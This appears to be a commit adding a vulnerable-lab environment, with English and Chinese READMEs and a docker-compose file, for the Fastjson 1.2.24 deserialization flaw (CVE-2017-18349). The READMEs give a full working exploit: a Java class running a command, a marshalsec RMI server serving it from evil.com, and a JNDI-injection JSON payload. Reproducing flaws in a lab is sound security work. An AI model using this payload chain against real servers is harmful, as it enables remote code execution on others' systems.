first commit

fastjson/1.2.24-rce/README.md

@@ -0,0 +1,83 @@
+# Fastjson 1.2.24 Deserialization Remote Command Execution (CVE-2017-18349)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Fastjson is a JSON parser developed by Alibaba. During the JSON parsing process, it supports using autoType to instantiate a specific class and call its set/get methods to access properties. By identifying relevant methods in the code, malicious exploitation chains can be constructed.
+
+References:
+
+- <https://www.freebuf.com/vuls/208339.html>
+- <http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/>
+
+## Environment Setup
+
+Execute the following command to start the test server that use Fastjson 1.2.24 as the default JSON parser:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8090` to see a JSON format output.
+
+You can update the server information by POSTing a JSON object to this address:
+
+```
+curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
+```
+
+## Vulnerability Reproduction
+
+Since the target environment is Java 8u102, which doesn't have the `com.sun.jndi.rmi.object.trustURLCodebase` restriction, we can use the `com.sun.rowset.JdbcRowSetImpl` exploitation chain to execute commands through JNDI injection.
+
+First, compile and upload the command execution code, such as `http://evil.com/TouchFile.class`:
+
+```java
+// javac TouchFile.java
+import java.lang.Runtime;
+import java.lang.Process;
+
+public class TouchFile {
+    static {
+        try {
+            Runtime rt = Runtime.getRuntime();
+            String[] commands = {"touch", "/tmp/success"};
+            Process pc = rt.exec(commands);
+            pc.waitFor();
+        } catch (Exception e) {
+            // do nothing
+        }
+    }
+}
+```
+
+Then, using the [marshalsec](https://github.com/mbechler/marshalsec) project, start an RMI server listening on port 9999 and specify loading the remote class `TouchFile.class`:
+
+```shell
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
+```
+
+Send the payload to the target server with the RMI address:
+
+```
+POST / HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 160
+
+{
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"rmi://evil.com:9999/TouchFile",
+        "autoCommit":true
+    }
+}
+```
+
+As shown below, the command `touch /tmp/success` has been successfully executed:
+
+![](1.png)

fastjson/1.2.24-rce/README.zh-cn.md

@@ -0,0 +1,81 @@
+# Fastjson 1.2.24 反序列化导致任意命令执行漏洞（CVE-2017-18349）
+
+Fastjson 是阿里巴巴开发的一款 JSON 解析器。在解析 JSON 的过程中，它支持使用 autoType 来实例化某一个具体的类，并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法，攻击者可以构造出恶意利用链。
+
+参考链接：
+
+- <https://www.freebuf.com/vuls/208339.html>
+- <http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/>
+
+## 环境搭建
+
+执行如下命令启动测试服务器，其使用 Fastjson 1.2.24 作为默认 JSON 解析器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8090` 即可看到 JSON 格式的输出。
+
+我们可以通过向该地址发送 POST 请求来更新服务端的信息：
+
+```
+curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
+```
+
+## 漏洞复现
+
+由于目标环境是 Java 8u102，没有 `com.sun.jndi.rmi.object.trustURLCodebase` 的限制，我们可以使用 `com.sun.rowset.JdbcRowSetImpl` 的利用链，通过 JNDI 注入来执行命令。
+
+首先编译并上传命令执行代码，如 `http://evil.com/TouchFile.class`：
+
+```java
+// javac TouchFile.java
+import java.lang.Runtime;
+import java.lang.Process;
+
+public class TouchFile {
+    static {
+        try {
+            Runtime rt = Runtime.getRuntime();
+            String[] commands = {"touch", "/tmp/success"};
+            Process pc = rt.exec(commands);
+            pc.waitFor();
+        } catch (Exception e) {
+            // do nothing
+        }
+    }
+}
+```
+
+然后使用 [marshalsec](https://github.com/mbechler/marshalsec) 项目启动一个 RMI 服务器，监听 9999 端口，并指定加载远程类 `TouchFile.class`：
+
+```shell
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
+```
+
+向目标服务器发送包含 RMI 地址的 Payload：
+
+```
+POST / HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json
+Content-Length: 160
+
+{
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"rmi://evil.com:9999/TouchFile",
+        "autoCommit":true
+    }
+}
+```
+
+如下图所示，命令 `touch /tmp/success` 已成功执行：
+
+![](1.png)

fastjson/1.2.24-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/fastjson:1.2.24
+   ports:
+    - "8090:8090"